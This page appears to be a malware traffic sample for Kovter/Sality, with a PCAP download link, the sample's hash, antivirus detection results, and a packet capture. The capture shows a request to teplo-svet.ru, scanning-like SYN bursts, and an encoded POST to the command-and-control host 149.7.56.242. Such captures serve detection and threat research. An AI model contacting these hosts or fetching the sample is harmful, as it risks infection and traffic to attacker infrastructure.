Malware Crimeware Kovter Variant Sality PCAP file download Traffic Sample POST 149.7.56.242

Download Attachments

  • 1 pcap 2
    Date added: May 15, 2017 2:32 am Added by: admin File size: 78 KB Downloads: 38

SHA256:     2c19e2d256bb104c7cfdc2e832db3ef2b52aa3fb7fb413fafff443767d64ba21
File name:     caa2db.png
Detection ratio:     21 / 61
Analysis date:     2017-05-14 22:41:25 UTC ( 0 minutes ago )

AegisLab     Ml.Attribute.Gen!c     20170514
AVware     Trojan.Win32.Kovter.ab (v)     20170514
Baidu     Win32.Trojan.WisdomEyes.16070401.9500.9999     20170503
Bkav     W32.eHeur.Virus02     20170513
CrowdStrike Falcon (ML)     malicious_confidence_95% (W)     20170130
Cyren     W32/Kovter.T2.gen!Eldorado     20170514
Endgame     malicious (high confidence)     20170503
F-Prot     W32/Kovter.T2.gen!Eldorado     20170514
Fortinet     W32/GenKryptik.AFPN!tr     20170514
Invincea     virus.win32.sality.at     20170413
Kaspersky     UDS:DangerousObject.Multi.Generic     20170514
McAfee     Artemis!D5CBA842097F     20170514
McAfee-GW-Edition     BehavesLike.Win32.BadFile.gc     20170514
Palo Alto Networks (Known Signatures)     generic.ml     20170514
Rising     Malware.Undefined!8.C (cloud:VCzxuyZpW1S)     20170514
Sophos     Mal/Kovter-Z     20170514

2017-05-14 20:53:50.917403 IP 192.168.1.102.57629 > 77.222.57.40.80: Flags [P.], seq 0:397, ack 1, win 256, length 397: HTTP: GET /counter/?2 HTTP/1.1
E…l.@…C….fM.9(…P…2….P….w..GET /counter/?2 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: teplo-svet.ru
Connection: Keep-Alive

2017-05-14 20:54:32.044891 IP 192.168.1.102.57634 > 185.117.72.90.80: Flags [S], seq 3960348986, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4    .@…-….f.uHZ.”.P..!:…… ..v…………..
2017-05-14 20:54:34.979543 IP 192.168.1.102.57636 > 89.128.122.206.80: Flags [S], seq 3814211414, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4,.@…8`…fY.z..$.P.X?V…… ……………..
2017-05-14 20:54:34.984644 IP 192.168.1.102.57637 > 4.147.159.25.443: Flags [S], seq 412506540, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..43.@…as…f…..%….Y……. ..2…………..
2017-05-14 20:54:34.984990 IP 192.168.1.102.57638 > 30.57.229.139.443: Flags [S], seq 1803044719, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4An@……..f.9…&..kxGo…… ..s…………..
2017-05-14 20:54:35.047201 IP 192.168.1.102.57634 > 185.117.72.90.80: Flags [S], seq 3960348986, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4    .@…-….f.uHZ.”.P..!:…… ..v…………..
2017-05-14 20:54:35.971540 IP 192.168.1.102.57639 > 110.149.5.72.80: Flags [S], seq 815124318, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@……..fn..H.’.P0..^…… .7……………
2017-05-14 20:54:37.000855 IP 192.168.1.102.57640 > 40.132.137.109.443: Flags [S], seq 3552221214, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4D&@…B….f(..m.(………… ..S…………..
2017-05-14 20:54:37.001006 IP 192.168.1.102.57641 > 113.37.247.181.443: Flags [S], seq 1968376134, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….T…fq%…)..uS      F…… ……………..
2017-05-14 20:54:37.001354 IP 192.168.1.102.57642 > 139.64.76.229.80: Flags [S], seq 2625793854, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4=.@…”….f.@L..*.P..o>…… ……………..
2017-05-14 20:54:37.538576 IP 192.168.1.102.57640 > 40.132.137.109.443: Flags [S], seq 3552221214, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4D’@…B….f(..m.(………… ..S…………..
2017-05-14 20:54:37.979641 IP 192.168.1.102.57636 > 89.128.122.206.80: Flags [S], seq 3814211414, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4,.@…8_…fY.z..$.P.X?V…… ……………..
2017-05-14 20:54:37.984593 IP 192.168.1.102.57638 > 30.57.229.139.443: Flags [S], seq 1803044719, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4Ao@……..f.9…&..kxGo…… ..s…………..
2017-05-14 20:54:37.986107 IP 192.168.1.102.57637 > 4.147.159.25.443: Flags [S], seq 412506540, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..43.@…ar…f…..%….Y……. ..2…………..
2017-05-14 20:54:37.998697 IP 192.168.1.102.57644 > 138.93.43.78.80: Flags [S], seq 4062964059, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4K.@…7….f.]+N.,.P.+.[…… ..R…………..
2017-05-14 20:54:38.076664 IP 192.168.1.102.57640 > 40.132.137.109.443: Flags [S], seq 3552221214, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0D(@…B….f(..m.(……….p. ..b……….
2017-05-14 20:54:38.971798 IP 192.168.1.102.57639 > 110.149.5.72.80: Flags [S], seq 815124318, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@……..fn..H.’.P0..^…… .7……………
2017-05-14 20:54:39.029411 IP 192.168.1.102.57645 > 219.160.233.9.80: Flags [S], seq 1109265395, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4u.@……..f…     .-.PB……… ……………..
2017-05-14 20:54:39.029560 IP 192.168.1.102.57646 > 143.152.93.69.443: Flags [S], seq 52045857, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…C….f..]E……(!…… ……………..
2017-05-14 20:54:39.029881 IP 192.168.1.102.57647 > 186.34.203.232.80: Flags [S], seq 1401377303, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4n.@…D….f.”…/.PS.R……. ……………..
2017-05-14 20:54:40.000997 IP 192.168.1.102.57641 > 113.37.247.181.443: Flags [S], seq 1968376134, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….S…fq%…)..uS      F…… ……………..

2017-05-14 20:55:15.763210 IP 192.168.1.102.57709 > 149.7.56.242.80: Flags [P.], seq 0:782, ack 1, win 260, length 782: HTTP: POST / HTTP/1.1
E..6>d@…)V…f..8..m.PE…….P…s…POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: 149.7.56.242
Content-Length: 504
Cache-Control: no-cache

dDkQjJI9V8g/sWQGkVkPOFln9Cu2a1Ft3vvFv/uu28Sbaayp4itduj1MVsgyESyD4hISKWXvYOIS3oCrpA6K3lzuLIDPsf4fR6BjBTxX+hhCwv1T2IXHwUrbqtku5b98qIulFTbVxhRIrcoth8zpfXNS0UWRBC7OUpkgTqofleVEw2OfTcvVocwoWgf347MCZNMo2KYtblWZJlKPKwM
SGF5AXg+IBNP84gK/n/4+GG5dTm7JWuWg2Odlru73/im8I4y3RCEnoLMMRiMODLea/+lDRwde18bLS/3k51y6BuCiqc9QlzeL1ng00Eea0AqQur+VicYLilQaaOt7j41LF8503Y8Ud095Jakv3V31c5bwDQjFsvWCEyv54ZT+2J5dAiL8Uu7mkQH4RoVZZGpA/1dxtCxmQ57mEOedfS
kQsNZWh2VTix69rGhEBb3FsgAEEytZVFk6bVHVVrHDghdgBXNqEYkjTe4gX+Rbn2fv6GlUJOd/66C93gU/
2017-05-14 20:55:15.869169 IP 192.168.1.102.57709 > 149.7.56.242.80: Flags [.], ack 527, win 258, length 0
E..(>e@…,c…f..8..m.PE…….P………….
2017-05-14 20:55:15.869540 IP 192.168.1.102.57709 > 149.7.56.242.80: Flags [F.], seq 782, ack 527, win 258, length 0
E..(>f@…,b…f..8..m.PE…….P………….
2017-05-14 20:55:16.185597 IP 192.168.1.102.57707 > 183.80.248.119.8080: Flags [S], seq 2165204769, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4WY@…1….f.P.w.k….g!…… ……………..
2017-05-14 20:55:16.297627 IP 192.168.1.102.57691 > 61.4.189.82.80: Flags [S], seq 3027012828, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0a.@……..f=..R.[.P.l……p……………
2017-05-14 20:55:16.298106 IP 192.168.1.102.57690 > 76.17.68.147.443: Flags [S], seq 4234031649, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0b.@…E….fL.D..Z…^2!….p……………

Leave a Reply